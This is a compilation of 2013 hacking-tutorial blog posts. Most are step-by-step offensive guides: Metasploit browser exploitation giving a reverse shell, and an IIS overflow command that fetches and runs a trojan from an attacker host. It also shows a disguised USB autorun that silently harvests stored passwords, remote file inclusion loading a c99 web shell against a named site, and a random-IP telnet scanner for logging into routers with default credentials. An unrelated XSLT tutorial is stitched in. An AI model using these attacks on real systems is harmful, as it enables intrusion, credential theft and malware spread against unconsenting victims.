Hacking Tutorial And Tips

How To Hack or Unblock Websense To Access Website

2013-01-05T05:59:00.000-08:00

Hey Friends Welcome Back , In previous post i have shared about How to hack victim's computer using NMAP. Today I am going to share a tutorial on ” How to Unblock or Hack or Bypass Websense to Access sites in Office or College”.
Note: The techniques are also applicable to bypass or hack any firewall like Cyberoam etc. As we know , Most offices has Websense Firewall to restrict the access to various websites. Sometimes this frustrates users as they are not being able to browse things freely.So Guys Read On..

First of all I would like to provide basic information about Websense. How it works and restricts users to access web freely.Websense blocks the website on basis of two things :

1. Category: Websense divides all the Websites over the internet in some categories like commercial, Business, Entertainment etc. Websense blocks the particular category completely means all websites of that categories are blocked.

2. Based on Meta Keyword : Websense regularly identifies certain keywords and add them to its database of blocked keywords. Now if any of these keyword is included in the Website TITLE or URL then it will be automatically blocked.

TECHNIQUES TO BYPASS OR UNBLOCK OR HACK WEBSENSE

1. Cached Copy Hack

Note: This hack doesn’t work on Websites blocked by second Websense Technology. But all the websites blocked by first category can be easily accessed.

When you search anything using Google In the each search result there are two things in blue color prior to URL i.e Cached and Similar. To view that blocked Website You have to click on Cached.

Most Websites can be opened using this Technique but some websites require some more efforts. You have to do some more ting like you have to remove certain codes from the Cached URL.

Hope this will help you to access almost all blocked websites except social networking one’s.

2. Finding a Good Proxy

You can also bypass Websense using several proxy sites. Note: Most of the proxy sites will be blocked after one or two days. So you have to search for proxies regularly. But I have an easy method to find proxies..

you have to use the cached copy hack to find the daily proxy websites…

Method to Find Proxy:

Open the Google and In search Query column type “tech-faq Proxy” without quotes. Now open the Cached copy of the website. Here you will find daily new proxy list now you have to copy the proxy URL’s and check for working Proxies.

Now using proxy you can unblock any Website but I will advice don’t open Social Networking sites and Emails using these.

3. Using Cloud Computing (Virtual Operating System)

For Opening Gmail , gtalk, Yahoo, Hotmail means all email clients you can use virtual operating system. For this you have to register on cloud computing website. After that you will get Virtual computer online which you can use anywhere in the world just you need a internet connection.

Some Virtual Operating Websites are:

1. www.icloud.com

2. www.startforce.com/os/

4. Bypass or Unblock Downloading RESTRICTION

In most corporate offices you have download restrictions. I will tell you the basic simple method to bypass all downloading restrictions. Just follow the following instructions.

Open the Internet Explorer then go to Tools then to Internet Options and Then Click on Security Tab. Now Click on internet Icon and then on default level and then click on Local Internet and then again on default level and then on Trusted Sites and Again on default level then click On apply.

Now you will be able to download anything without any restriction. Enjoy happy downloading…

How To Hack Victim's Computer With Nmap And Metasploit

2013-01-05T05:58:00.002-08:00

Today I am writing a tutorial on hacking with Nmap with Metasploit. First d/l Metasploit from the official website,Link:

Code:

http://www.metasploit.com/

Let  all that install, and towards the end of the installation it will ask if you would like Nmap installed also,

choose yes. Once you have that installed the  Metasploit screen will  open up as shown below...

Now type db_create

Once you have typed that type nmap

This loads nmap, as shown below....

You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X's being victims Ip number), Demonstrated below.

Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...

This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.

Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

Hack PC (Get Command Line) without Sending Any File

2013-01-05T05:56:00.003-08:00

(Windows OS)
After Download & Install

Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console

Then Do Like This(Bolds Texts is Which You must Write):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:http://192.168.0.151:8080/[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]

Learn How To Hack Web Servers

2013-01-05T05:56:00.000-08:00

iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.

c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe

www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.

A sample exploit can be constructed as shown below:

To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.

To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.

c:\>iishack.exe  80 /ncx.exe

The attacker can then use netcat to evoke the command shell

c:\>nc  80

He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.

Install latest service pack from Microsoft.
Remove IPP printing from IIS Server
Install firewall and remove unused extensions
Implement aggressive network egress filtering
Use IISLockdown and URLScan utilities
Regularly scan your network for vulnerable servers

Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.

As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.

Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree.

With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.

Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.

IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.

HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods

Exploit / Attack Methodology

By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.

The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.

"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

How to Sniff/Hack Passwords Using USB Drive?

2013-01-05T05:54:00.002-08:00

In My Previous posts i have write about Hacking email passwords using keyloggers and phishers. we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messengeretc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as all files and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Hack a Website Using Remote File Inclusion

2013-01-05T05:53:00.003-08:00

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Hack Somone's Computer On Your Network Using His IP Address

2013-01-05T05:52:00.002-08:00

In my previous i have written about Network Hacking. In this post i will tell you about how to hack someone ip address if you get someone's ip address you can easily get in to his system and can day anything you want. You can check his location and also easily access his data.

Step 1
First of all,get a good IP scanner.

Step 2
Now click on start and then go to run and then type there "CMD" and press ok

This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace
an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive.

Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.

Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

Creating Truly Skinnable Web Sites (ver.1.0.0)

2013-01-05T05:49:00.002-08:00

A few months back, while working on bread5 (my new, at that time, ultra-secret web site), I had a thought: wouldn't it be cool if I could serve up bread5 with any look I wanted, without having to create entire sites with different layouts by hand. I didn't want to just change the color scheme like most “skinnable” sites; I wanted to create completely different looks without going through too much trouble. The skin engine that I created for bread5 uses a host of new technologies to accomplish its tasks; these technologies include php, XML, XSLT, and XHTML. I've never seen anyone create dynamic sites that are truly skinnable, so this is all new and uncharted territory for me. As a result, the method I describe in this article may not be the best way to do this, but I think it works very well. This is an advanced tutorial. The reader should be familar with PHP and XML.

The idea is simple: when one wants to create different versions of one's site, all the data is the same, the only thing that has changed is the layouts. So joe-webmaster makes up some layouts then goes at the task of copying-and-pasting his site's data into these layouts. He does this over and over for every page on his site. There must be a better way—there is. Since the site's data (such as product information) is the same for every layout, put all the data in an XML file and transform the data into the completely different layouts using XSLT. So, if I wanted to create a new skin for bread5, all I would have to do is create a few XSL files for the skin, upload it to the server, and it's done; the user can choose whichever skin he or she wants to view the site in. Using this method, you can increase the accessibility of your site just by creating screen reader and WAP compatible skins. In a few minutes your site can now be easily accessed by a women using her cell phone, or a blind man sitting at home.

To get started, take your data and put it in an XML file. For example, a site's index page might look like this:


    

      ./faq.php

      FAQ

      Frequently Asked Questions about this site

    

    

      ./search.php

      post

      

    

    

   

  

    

      Welcome to my site!

    

    

      Please check out all the sections.

    

  

  

    

      November 29, 2001

      Some stuff happened.

    

    

      November 30, 2001

      Some more stuff happened.

Looks pretty simple, but it can be improved upon to make it even easier for us to maintain. Instead of adding a news story by manually editing the file, I'd like to pull the stories out of my database. That way, I can create a simple script to put my news in the database and then I can easily add news stories without having to FTP in to the server and edit the file.

We'll be using php's XSLT extension, Sablotron, to transform the XML file (discussed later on), so why not use its power to add dynamic content to the XML file also? It's easy to do. Just have php hold the XML data, pass it to Sablotron and have it pass the data to the XSL file. For example, to pull news stories out of a MySQL database and have it added to the XML file, we would do the following:

// code to connect to the database and pull the stories omitted for brevity.

// $db_query holds an SQL query to pull news stories out of the database. 

$xsltArgs["stories"]="";



while($row= mysql_fetch_array($db_query)

{

  $date= $row["date"];

  $story= $row["story"];



  $xsltArgs["stories"].="

      $date

      $story";

}



$xsltArgs["stories"].="";

$xsltArgs is an array. $xsltArgs["stories"] holds the XML for the news stories. This variable will be used later when the transformation takes place. If you want to add more dynamic data to your site, store it as XML in another slot of the array.

Now that we've created the XML file for the index page, we can create an XSL file that will be used by Sablotron to transform the XML file. Here is an XSL file that will transform the XML file into a simple XHTML web page.


http://www.w3.org/1999/XSL/Transform

"> http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> My Web Site - <xsl:value-of select="mySite/@title" />

News::

You could repeat this and create many different XSL files to output many different pages (such as a WML page for viewing on a WAP enabled device). If you stored more dynamic content in another slot of the $xsltArg array, you can retrieve it in your XSL file by using:

document('arg:/')

where would be the name of the slot in the array.

Now all that is left to do is apply the XSL transformation to the XML file. To do this, I use php's XSLT extension, Sablotron. I should mention that Sablotron is not enabled in default php installations. To activate it on a *nix machine, run the following:

./configure --enable-xslt --with-xslt-sablot

If you're being hosted by someone else, ask them to do it for you. I chose a server side transformation because many browsers lack the ability to do transformations on the client end. By doing the transformation on the server, you're guaranteed that the transformation will occur.

The simplest way to use XSLT in php is to pass the path to both the XML file and the XSL file to the xslt_run() function like this:

// First create an XSLT processor.

$xh= xslt_create();



// $xsl holds the path to the XSL file. $xml holds the path to the XML file.

xslt_run($xh, $xsl, $xml, "arg:/_result", NULL, $xsltArgs); 



$result= xslt_fetch_result($xh);



// Finally, free the XSLT processor since we're done using it.

xslt_free($xh);

The $result variable will hold the transformed page which you can then output using echo or do whatever else you may want to do.

The transformation process is a bit different on servers running PHP 4.1 and above. I believe, for completeness, I should explain how it is done. If you're running a lower of version of php, feel free to skip this part. With the advent of PHP 4.1, a new interface to the XSLT engine has been added. Now, to transform an XML file, one does the following:

// First create an XSLT processor.

$xh = xslt_create();



// Next, pass either two variables, one holding the path to an XSL file and one 

// holding the path to an XML file. $result holds the transformed data. 

$result= xslt_process($xh, $xsl, $xml, NULL, $xsltArgs);



// Finally, free the XSLT processor since we're done using it.

xslt_free($xh);

There you have it, a simple way to create truly skinnable web sites. What I've just described is pretty basic, you can improve on it. For example, you can have php automatically determine if the user is on a WAP device and have it serve up a WAP page. Also, you can create many skins and have a page that displays a screen shot of each skin, letting the user choose which one he or she wants to view the site with. Then, you can store the user's choice in a cookie, so the next time the user visits the site, the skin he or she chose is already applied. I hope you learned a lot from this tutorial and start using this technique. As always, if you find any errors or have any comments please send them to me (spiderman@witty.com). Kindly direct questions to the message board. Until next time...

Refrences:

Hack Router For Exploration

2013-01-05T05:48:00.000-08:00

EMOTE ROUTER HACKING
Introduction
In my previous posts i have explained how to hack PC using IP address and how to hack someone's PC using NMAP(Networking Tool). In this post i will explain about router hacking. OK, Basically this tutorial deals with how to scan large amounts of addresses for telnet services, which we can then attempt to use default credentials to log in with surprising success.

Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by SSH because telnet sends packets in plain text where as SSH encrypts packets. But telnet is still very much used on routers for simple administration by low tech management systems that come packaged with a lot of off the shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So what do i need ?
You'll need to run this Perl script, (written by me, found below), this simply generates a random IP address, if the IP is in a scannable class (ie not a private, experimental or loop back address) the program attempts to open a connection to the telnet port (23) of the random ip, if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers - i have left mine overnight before and collected 880 servers before.

Code:

#!/usr/bin/perl

use IO::Socket;

########################### IP GENERATOR ########################

sub ipgen(){

my $range1 = 223;                        #avoid experimental and multicast

my $range2 = 254;        

$oct1 = int(rand($range1)) + 1;                    #generate random octets

$oct2 = int(rand($range2)) + 1;

$oct3 = int(rand($range2)) + 1;

$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips

$ip = &ipgen();                            #if local or private call again

}else{

$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return

}

return $ip;                            #return to caller

}

#################################################################

############################## MAIN #############################

print "########################################\n";

print "#---------Random Telnet Scanner--------#\n";

print "#-----------Written by 50LaR15---------#\n";

print "########################################\n";

while(1==1){                            # keeps code running indefinately

$target = &ipgen();                        # get random ip to scan

print "*??* SCANNING: $target \n";                    # output

my $sock = new IO::Socket::INET (                # try to create socket to chose random address

                 PeerAddr => $target,

                 PeerPort => '23',        # change this number to change ports you want to detect

                 Proto => 'tcp',

                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 2 to be safe

                 );

if($sock){                            # if socket opened (port open)

print "*!!* SUCCESS-: $target \n";                # print to screen

open(DAT, ">>telnet.txt") || die("Cannot Open Output File");     # open results file

print DAT "SUCCESS: $target \n";                # append findings to end of file

close(DAT);                            # close the file

}

close($sock);                            # close the socket

}################################################################

You'll also need need a telnet client - I recommend you use putty because it supports proxy's but you are dealing with people who don't know how to change there router passwords so you shouldn't be too worried so you can use the default OS telnet client - for windows XP/linux users you will already have one - for windows 7 users you will need to enable yours.

Ok - I'm Set Up - So Now What?
You'll need to start a few instances of the Perl script, you can make your desktop look pretty like mine below if you wish.

You can just run one but it will take longer to get a decent sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

OK now you have your list of IP's with the telnet port open (called telnet.txt in the same directory as your Perl script), what you need to do is take your telnet client and just start connecting to them, - you will be prompted for a username + password.

This is where it gets fun - because a large amount of routers ship with default accounts - here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest a lot of routers disclose there model number in the telnet banner when you connect so a simple Google search often turns up the default username and password. Otherwise i try the top 3 and usually get disconnected and move on to the next in my list.

You will find out quiet fast how many ip's in your list you can actually log into with full admin rights

Who Exactly Am I Hacking?
This is half the fun for me - you don't really know - if your interested you can just do a quick whois -but around 90% of the time your dealing with home routers that people have bought from a shop and not configured properly but i have found business and offices that have succumb to the same laziness as the home user so the possibilities are endless.

Ok now what ?
From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. Today i found one that let me download any C code onto it i wanted - almost every router OS is different so some take a while to get used to what commands you can run but it is a lot of fun finding out peoples network layout, i have compromised routers, made my way into the internal file servers of the network using brute forcers, or setting up port forwarding on the router to give me access externally to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copies of the dictionary or what ever literature tickles your pickle.

A funny concept that i have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RAT's spread, especially if you find a router with upwards of 100 PC's behind the router - but i don't deal much with rat's and botnets so don't quote me on that.

A Small Aside.

Ill be happy if a few people read this tutorial and explore a few networks because that's what used to drive hacking forwards, and its what used to motivate hackers, the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting there best friends fu**book password and the real fun somehow has been lost in the past 10 years to a new generation of kids that just want everything now. Lets keep some of the old skills and knowledge alive and not let it be lost in the archives of long since abandoned forums and irc rooms.

The FTP Tutorial

2013-01-05T05:46:00.001-08:00

In my previous posts i will explained about hacking a stable website and also hacking on networks. Today i will explained you about File Transfer Protocol (FTP) so you can easily manage and create your own website and understand about the control panel in web servers.

What Is FTP and What Is It Good For?
------------------------------------
The word FTP (see footnote 1 below) stands for File Transfer Protocol(1).
FTP servers will let you to both download (retrieve a file from the server) and upload (send a file to the server) files from the server with great ease (if you have permission to do so).
You browse through a remote FTP site the same way you browse through your own computer's files and directories (of course, you don't have read and/or write access to every file on the system, and some files you can't even see).

FTP Commands
------------
The following are several basic FTP commands. To communicate with FTP daemons(7), connect to port(2) 21 and then use the following commands (see footnote 2 below) to communicate with the FTP server:
cd      change directory (on the server)
lcd     change local directory (when sending a file, the path(4) of the specified file will be the path you specify on lcd)
dir,ls directory listing
binary change mode to binary transfer
get     retrieve a file
mget    retrieve many files
put     send a file
mput    send many files
pwd     print working directory on the server

Footnotes
+++++++++
1. For thousands of computer-related acronyms and abbreviations head to blacksun.box.sk and download the file called acros.txt from the projects page.
2. If you don't feel like typing stupid commands, there are lots of FTP clients(5) who will do all the work for you, but fortunately some will still show you all the commands they use so you'll be able to learn new commands.
You can download FTP clients for every Operating System from TUCOWS. Simply go to the nearest TUCOWS mirror site(3) or go directly to www.tucows.com.

FTP Hacking
-----------
Since there are so many FTP holes for so many FTP server programs and so many Operating Systems, I decided that the best way it simply to explain to you how to find information about security holes by yourself.
I will also introduce several interesting FTP security holes near the end of this section.
To find FTP exploits, try searching the following websites (or join the BugTraq mailing list at www.securityfocus.com):
CERT (Computer Emergency Response Team) - http://cert.org
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Packet Storm - packetstorm.genocide2600.com
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
Fyodor's Exploit World - http://www.insecure.org/sploits.html
Spikeman's Denial Of Service Website (for DoS(9) attacks against FTP servers) - http://www.genocide2600.com/~spikeman/
RootShell - http://www.rootshell.com
Slashdot - http://www.slashdot.org
Data - http://www.hideaway.net/data.html
(Please report all dead links to barakirs@netvision.net.il)

Note: one might think that the above sites are considered illegal, since they feature explanations about security holes and how to exploit them.
Well, screw one. These things are called "advisories" and they allow you to find holes on your own PC and fix them. Whether you use this information to secure yourself or hack others is your own choice. It's the difference between legitimate and illegal.

After you get to one of the following search sites (I recommend the BugTraq Archives) search for the keywords you want.
For example: you find out(5) that your target is using this OS with this FTP server and this Webserver program etc'. Try combining all of those pieces of information and I'm sure you'll find the holes that fit you the most.
You can also try searching holes on your own computer.
Speaking about holes, we will explain about many security holes on the upcoming Sendmail tutorial (see blacksun.box.sk).
Now, for several selected FTP holes.

Selected FTP Holes
******************
The following FTP holes aren't new or extraordinary or incredibly fantastic or anything of that sort of matter. They're just good for learning.
I picked some interesting FTP holes and written a small explanation about them just to get the newbies started.
Note: the sites I got these from aren't "evil hacking sites". These explanations are called advisories and they are meant to be used by people who want to fix bugs on their systems. Whether you use them for that purpose or others is none of our business.

1) Some FTP daemons allows a premature PASV command, which can cause some FTP daemons to crash with a core dump(9). FTP core dumps can be used to salvage encrypted passwords, bypassing any shadow password scheme.
It is not known exactly which servers are immune to this and which are not, and the only workaround right now is to get a newer FTP server program.
Also see http://www.genocide2600.com/~spikeman/bisonware3.html for a DoS(9) attack against BisonWare FTP Server 3.5 similar to this hole.

2) FTP Bounce Attack (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425 (From BugTraq))

3) Local bug in FTP Daemon (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1345 (From BugTraq))

4) (Quotes in partfrom BugTraq) Impact: Anybody from outside can shutdown your pc ftp server. And if u are under win3.1 the system will crash.
Program: WinQVT/NET
Version: All versions.. 16 and 32 bits
Solution.. dont use it or upgrade
Exploit: Just Send a OOB (Out of Band) to port 21,
Exploit for dummies: Take any winnuke, start it, and when u find a "139" change it to "21" instead.
OK, I know this is stupid....... :P. But maybe somebody will need it.. who knows...
Note: A patched version of NT 4.0 isn't vulnerable to this running MS's FTP server. I haven't had a chance to test an unpatched server, but IIRC, I did check the FTP port when the OOB problem was first reported and it didn't cause a crash.
I would suspect that this could be a DOS/Win problem in general, and might not be specific to the WinQVT package.

I hope this helped you learn how to find holes. There will be much more examples in the Sendmail tutorial.

